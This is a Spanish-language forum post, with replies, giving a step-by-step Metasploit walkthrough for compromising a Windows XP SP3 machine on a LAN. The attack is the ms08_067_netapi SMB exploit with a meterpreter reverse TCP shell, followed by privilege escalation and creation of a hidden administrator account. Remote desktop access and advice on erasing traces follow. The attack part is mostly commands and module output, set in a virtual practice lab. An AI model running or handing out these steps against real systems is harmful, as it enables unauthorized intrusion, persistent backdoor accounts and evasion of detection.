http://www.youtube.com/watch?v=apkIy005OE8
Buenas, en este post se muestra al proceso mediante el cual se accede a un Windows XP SP3 en una red LAN desde metasploit, se obtiene una sesión con meterpreter en el sistema y luego se añade un usuario con privilegios de administrador al sistema. Por último se obtiene una GUI remota, lo que podría facilitar determinadas acciones.
Si luego se quieren eliminar rastros una de las cosas más importantes es eliminar desde meterpreter el usuario creado.
Para esta práctica se utilizan:
- BackTrack 5 R3
- Windows XP SP3 virtualizado en VMWare Player
En todo momento se deben sustituir los valores:
"miIP" por vuestra IP Local
"suIP" por la IP de la máquina a vulnerar
"tuusuario" por el nombre de usuario que elijas
"tupass" por la contraseña que elijas
Una vez presentado el entorno, aquí van los pasos:
1- Comprobar la máquina vulnerada, para hacerlo de forma rápida se utilizará nmap. Sintaxis: nmap -O suIP
2- Una vez comprobado, ejecutar la consola de Metasploit. Sintaxis: msfconsole
3- Cargar el exploit. En este caso utilizamos uno que ataca al protocolo smb. Sintaxis: use exploit/windows/smb/ms08_067_netapi
4- Seleccionamos un PAYLOAD, se utilizará un meterpreter con conexión inversa. Sintaxis: set PAYLOAD windows/meterpreter/reverse_tcp
5- Se coloca la IP local. Sintaxis: set LHOST miIP
6- Se coloca la IP remota. Sintaxis: set RHOST suIP
7- Comprobar que no queden campos vacíos (opcional). Sintaxis: show options
Debe salir algo así:
Citarmsf exploit(ms08_067_netapi) > show options
Module options (exploit/windows/smb/ms08_067_netapi):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOST 192.168.1.153 yes The target address
RPORT 445 yes Set the SMB service port
SMBPIPE BROWSER yes The pipe name to use (BROWSER, SRVSVC)
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique: seh, thread, process, none
LHOST 192.168.1.102 yes The listen address
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic Targeting
Nota: los campos de las IP deben ser los vuestros
8- Lanzar el exploit. Sintaxis: exploit
9- Una vez en meterpreter se obtiene el sistema. Sintaxis: getsystem
10- Una vez tenemos privilegios hay que crear un nuevo usuario. sintaxis: run getgui -u tuusuario -p tupass -e
11- Obtenemos una shell en el sistema. Sintaxis: shell
12- Elevar privilegios al usuario. Sintaxis: net localgroups administradores tuusuario /add Donde administradores es el nombre del grupo de admins.
13- En una nueva pestaña de la terminal se utiliza la herramienta rdesktop. Sintaxis: rdesktop -u tuusuario -p tupass suIP
Y se abre una ventana con la GUI.
Un saludo ((:
dale se nota ya has llegado a la parte de post-explotación de metaesploit para pentesters xd
PD : Buen post
Sí, Sanko, la idea está sacada del libro, pero llegué hace mucho, de hecho lo terminé antes de fin de año.
Gracias ((:
No tienes permitido ver los links.
Registrarse o Entrar a mi cuenta
dale se nota ya has llegado a la parte de post-explotación de metaesploit para pentesters xd
PD : Buen post
No tienes permitido ver los links.
Registrarse o Entrar a mi cuenta
Sí, Sanko, la idea está sacada del libro, pero llegué hace mucho, de hecho lo terminé antes de fin de año.
Gracias ((:
No tienes permitido ver los links.
Registrarse o Entrar a mi cuenta
dale se nota ya has llegado a la parte de post-explotación de metaesploit para pentesters xd
PD : Buen post
No es nada malo por si sono mal xd , lo del libro lo decia porque no hace mas de 3 dias acabe de leer sobre ello